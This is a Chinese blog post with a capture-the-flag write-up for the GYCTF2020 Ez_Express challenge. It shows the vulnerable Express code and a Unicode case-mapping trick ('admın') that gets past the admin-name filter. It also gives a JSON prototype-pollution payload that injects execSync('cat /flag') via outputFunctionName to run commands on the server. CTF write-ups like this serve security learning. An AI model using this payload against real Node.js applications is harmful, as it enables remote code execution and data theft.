[GYCTF2020]Ez_Express 原型链污染 js大小写特性

最新推荐文章于 2024-07-27 21:23:02 发布
最新推荐文章于 2024-07-27 21:23:02 发布
阅读量862 收藏 2
点赞数
CC 4.0 BY-SA版权
文章标签: javascript 前端 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/scrawman/article/details/122664989
本文介绍GYCTF2020中Ez_Express挑战的解决过程,通过构造特殊用户名绕过过滤机制并利用原型链污染获取flag。详细解释了如何利用JavaScript特性及代码漏洞实现攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[GYCTF2020]Ez_Express
随便注册一个账号登录,查看源代码可以发现www.zip的提示
在这里插入图片描述
下载源码,找到index.js

var express = require('express');
var router = express.Router();
const isObject = obj => obj && obj.constructor && obj.constructor === Object;
const merge = (a, b) => {
  for (var attr in b) {
    if (isObject(a[attr]) && isObject(b[attr])) {
      merge(a[attr], b[attr]);
    } else {
      a[attr] = b[attr];
    }
  }
  return a
}
const clone = (a) => {
  return merge({}, a);
}
function safeKeyword(keyword) {
  if(keyword.match(/(admin)/is)) {
      return keyword
  }

  return undefined
}

router.get('/', function (req, res) {
  if(!req.session.user){
    res.redirect('/login');
  }
  res.outputFunctionName=undefined;
  res.render('index',data={'user':req.session.user.user});
});


router.get('/login', function (req, res) {
  res.render('login');
});



router.post('/login', function (req, res) {
  if(req.body.Submit=="register"){
   if(safeKeyword(req.body.userid)){
    res.end("<script>alert('forbid word');history.go(-1);</script>") 
   }
    req.session.user={
      'user':req.body.userid.toUpperCase(),
      'passwd': req.body.pwd,
      'isLogin':false
    }
    res.redirect('/'); 
  }
  else if(req.body.Submit=="login"){
    if(!req.session.user){res.end("<script>alert('register first');history.go(-1);</script>")}
    if(req.session.user.user==req.body.userid&&req.body.pwd==req.session.user.passwd){
      req.session.user.isLogin=true;
    }
    else{
      res.end("<script>alert('error passwd');history.go(-1);</script>")
    }
  
  }
  res.redirect('/'); ;
});
router.post('/action', function (req, res) {
  if(req.session.user.user!="ADMIN"){res.end("<script>alert('ADMIN is asked');history.go(-1);</script>")} 
  req.session.user.data = clone(req.body);
  res.end("<script>alert('success');history.go(-1);</script>");  
});
router.get('/info', function (req, res) {
  res.render('index',data={'user':res.outputFunctionName});
})
module.exports = router;

首先想办法以admin登录,在注册的时候如果以ADMIN注册会弹出forbid word,这里admin被过滤了,无论大小写。

function safeKeyword(keyword) {
  if(keyword.match(/(admin)/is)) {
      return keyword
  }

但在注册完存放用户名的时候,会被转成大写。利用javascript的特性,"ı"的大写是“I”、"ſ"的大写是“S”。因此用admın绕过。

req.session.user={
      'user':req.body.userid.toUpperCase(),
      'passwd': req.body.pwd,
      'isLogin':false
    }

在这里插入图片描述
继续看源码发现merge和clone那多半是原型链污染

const merge = (a, b) => {
  for (var attr in b) {
    if (isObject(a[attr]) && isObject(b[attr])) {
      merge(a[attr], b[attr]);
    } else {
      a[attr] = b[attr];
    }
  }
  return a
}
const clone = (a) => {
  return merge({}, a);
}

我们在框中的输入提交后触发/action,其中触发了 req.session.user.data = clone(req.body);
关于原型链污染,这篇文章讲的很详细https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html#0x02-javascript
要达成的目标可以看/info,将outputFunctionName渲染到页面中,但是这个outputFunctionName没有定义。所以我们可以给对象原型的类添加一个outputFunctionName属性,通过它得到flag。

router.get('/info', function (req, res) {
  res.render('index',data={'user':res.outputFunctionName});
})

content type改成application/json
payload:

{"lua":"a","__proto__":{"outputFunctionName":"a=1;return global.process.mainModule.constructor._load('child_process').execSync('cat /flag')//"},"Submit":""}

在这里插入图片描述
再访问/info得到flag
在这里插入图片描述

scrawman
关注
[GYCTF2020]Ez_Express
snowlyzz的博客
09-03 771
JavaScript 原型链学习
[GYCTF2020]Ez_Express 原型链污染
qq_54929891的博客
05-03 692
进入链接可以发现是一个登录界面 ,自己注册一个新账户的话登陆进去什么东西也没有,提示你要用ADMIN登录,我账户名用ADMIN的话,报错敏感信息 难道是一个烦人的注入题么,不急先扫一下站看看,发现有个www.zip压缩包泄露,将源码下载下来 可以了解到是一个js的题目,寻找一下跟登录有关的界面代码 router.post('/login', function (req, res) { if(req.body.Submit=="register"){ if(safeKeyword..
[GYCTF2020]Ez_Express-原型链污染学习
cjdgg的博客
08-18 3072
[GYCTF2020]Ez_Express-原型链污染学习 最近学习下nodejs相关的题目,所以做了这道题 进入题目界面长这样 简单的试了下功能,也就是一个登录注册按钮,登陆后如下所示 要求需要ADMIN登录,这是一个不能注册的账户,而且我们又不知道密码 没法进行下去的时候试一试扫描目录,结果还真扫出了源代码 通过审代码我们发现,注册的时候调用了safeKeyword函数,这个函数使我们注册时不能用admin,但是又需要题目要求用ADMIN登录才行 这里我是正好看了做上一道js题目时收藏的tric
EZ-USBFX2.rar_ez usb _ez-usb_ez-usb fx2
09-21
"EZ-USB FX2.rar_ez usb _ez-usb_ez-usb fx2"这个标题可能是指一个包含EZ-USB FX2相关资料的压缩文件,包括驱动程序和可能的技术文档。 **EZ-USB FX2关键特性** 1. **集成USB控制器**: EZ-USB FX2内含一个全速USB ...
ez_setup.py下载
05-16
ez_setup.py下载
打印机驱动 SW_EZ_V2.63p_b6
05-26
打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V...
ez_setup.py
05-26
"ez_setup.py" 是一个在Python环境中用于安装setuptools的脚本文件。setuptools是Python的一个重要库,它提供了一套全面的工具集,用于管理、构建、打包和部署Python项目。这个脚本通常用于在没有其他包管理器(如...
EZ.RAR_EZ_ez-usb_编程器 51
09-19
EZ-USB编程器作为一种通用的USB接口解决方案,它的出现极大地简化了51单片机编程过程。EZ-USB编程器通过USB接口与计算机相连,相比传统的并行口或串行口编程器,它在数据传输速率、连接方便性和设备兼容性方面都具有...
Ezjs:一个危险的Javascript库,可为复杂的Javascript添加简单性
05-08
Ezjs 这是一个Javascript库,为复杂的Javascript添加了简单性。 它扩展了默认Javascript对象的原型,以便添加更多方法和功能,以实现更高效,更快速的代码。 像那种和 ,只是多一分危险。 安装 要开始使用Ezjs,只需将ezjs.jsezjs.min.js到您HTML中,如下所示: < script src =" ezjs.js " > </ script > 或缩小版本(提高性能和加载时间): < script src =" ezjs.min.js " > </ script > 还建议您将Ezjs [removed]标记放在结束body标记</body>上方。 文献资料 这是Ezjs的文档。 如果看到别名,则意味着别名也可以调用该方法名称,例如: "brenden" . capitalize ( ) ; //==> "Brenden" 是相同的:
2021-3-18_js原型链之_[GYCTF2020]Ez_Express
抒情诗
03-18 475
这题是第一次接触到的js原型链,学得太慢了 新手学习,不免有错漏。 js原型链污染就是js在调用数组下标或者对象的属性的时候如果没有在自己这里发现相关的就会自动向上查找,emmm因为js中一切皆对象,一个对象的__proto__还是一个对象,对象.__proto__就叫做对象的原型?好像是这样。然后会一直向上查找知道找到Object的原型为null似乎是,然后他向上查找的这条链就叫做JavaScript原型链。我们这里要用的原型链污染其实就是因为,如果JavaScript代码之中有一个东西没有经过定义并
redpwnctf-web-blueprint-javascript 原型链污染学习总结
weixin_30376453的博客
08-19 311
前几天看了redpwn的一道web题,node.js的web,涉及知识点是javascript 原型链污染,以前没咋接触过js,并且这个洞貌似也比较新,因此记录一下学习过程 1.本机node.js环境安装 题目都给了源码,所以本地就可以直接安装package.json依赖并本地模拟调试 首先subline安装node环境: http://nodejs.org/ http...
CTF】Python原型链污染
Luminous_song的博客
08-05 2171
在Python中每个对象都有一个原型,原型上定义了对象可以访问的属性和方法。当对象访问属性或方法时,会先在自身查找,如果找不到就会去原型链上的上级对象中查找,原型链污染攻击的思路是通过修改对象原型链中的属性,使得程序在访问属性或方法时得到不符合预期的结果。
CTFshow--nodejs 原型链污染
最新发布
pwfortune的博客
07-27 1095
flag是一个变量, 但是也不可能知道flag的值是多少, 就不可能用上一道题的方法了.给了源码, 看到 login.js 里面有个copy() 函数。都是 对象, 在执行 copy 操作 ,构造一个请求体污染了。可以看到它的源码做了一点更改, 本地测试一下, 看看如何污染。这一题里面没有了 /api 路由 ,需要找到其他的污染口。是否有 ctfshow不重要, 让它的原型拥有就行,构造相应的query的值, 得到想要执行的结果。需要嵌套两层才能污染, 其他的跟上一题是一样的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值